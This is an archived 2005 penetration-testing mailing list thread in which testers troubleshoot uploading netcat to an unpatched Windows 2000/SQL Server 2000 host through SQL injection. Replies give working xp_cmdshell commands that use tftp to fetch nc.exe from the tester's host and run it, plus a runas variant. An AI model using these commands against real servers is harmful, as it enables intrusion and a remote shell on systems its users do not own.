Penetration Testing mailing list archives

Re: TFTP and XP_CMDSHELL - Weird

From: "Andres Molinetti" <andymolinetti () hotmail com>
Date: Thu, 23 Jun 2005 14:04:15 +0000

No luck.
Tried in every folder I could imagine.

Besides I am able to create a file through "xp_cmdshell 'echo a > c:\a.txt'" so I have write permissions in C.

I think the problem is the tftp client. Does anyone know if MS has fixed itin anyway not to allow downloads from low-privileged users?? or somethinglike that??


Thanks, Andy.

From: Frederic Charpentier <fcharpen () xmcopartners com>
To: Jose Selvi <jselvi () s2grupo com>
CC: Andres Molinetti <andymolinetti () hotmail com>,pen-test () securityfocus com
Subject: Re: TFTP and XP_CMDSHELL - Weird
Date: Thu, 23 Jun 2005 15:48:27 +0200

HI jose,

try like that

xp_cmdshell 'tftp -i yourHost GET nc.exe'
xp_cmdshell 'nc.exe'

and you will work in the current directory (c:\windows\system32).


Jose Selvi wrote:
Maybe sqlsvc user can't write in c:\ folder. Can He?.
The first call to tftp you are using Administrator user, who of course canwrite in c:\ .
Try "runas /user:sqlsvc tftp -i myHost GET nc.exe c:\winnt\temp\nc.exe".
It must work.

Andres Molinetti escribió:
Hi, I am testing a Web App vulnerable to SQL Injection.
It is hosted in a Windows 2000 SP4 and SQL 2000 with no patches.
While trying to use the xp_cmdshell to upload nc.exe from my tftpd serverto the Webserver, I experienced some problems.
I was able to execute xp_cmdshell 'echo a > c:\a.txt' . File is created.
As administrator (using a windows cmd.exe shell) I ran "tftp -i myHostGET nc.exe c:\nc.exe". File is downloaded.
When I tried it through the wep app it failed. I tried directly throughSQL Query Analizer and it also failed.
SQL is running as a low priviledged account (sqlsvc)...
Then I ran (as Administrator) "runas /user:sqlsvc tftp -i myHost GETnc.exe c:\nc.exe" and IT FAILED.!!
I can easily deduce that the problem is the TFTP client (tftp.exe)...

Any Ideas?
--
Frederic Charpentier - Xmco Partners
Security Consulting / Pentest
web  : http://www.xmcopartners.com


_________________________________________________________________

Descarga gratis la Barra de Herramientas de MSNhttp://www.msn.es/usuario/busqueda/barra?XAPID=2031&DI=1055&SU=http%3A//www.hotmail.com&HL=LINKTAG1OPENINGTEXT_MSNBH

Current thread:

TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 22)
- Re: TFTP and XP_CMDSHELL - Weird Jose Selvi (Jun 23)
  - Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
  - Re: TFTP and XP_CMDSHELL - Weird Frederic Charpentier (Jun 23)
    - Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)
    - Re: TFTP and XP_CMDSHELL - Weird Javier Fernandez-Sanguino (Jun 23)
    - Re: TFTP and XP_CMDSHELL - Weird - SOLVED Andres Molinetti (Jun 24)
- Re: TFTP and XP_CMDSHELL - Weird Diego Kellner (Jun 23)
  - Re: TFTP and XP_CMDSHELL - Weird Andres Molinetti (Jun 23)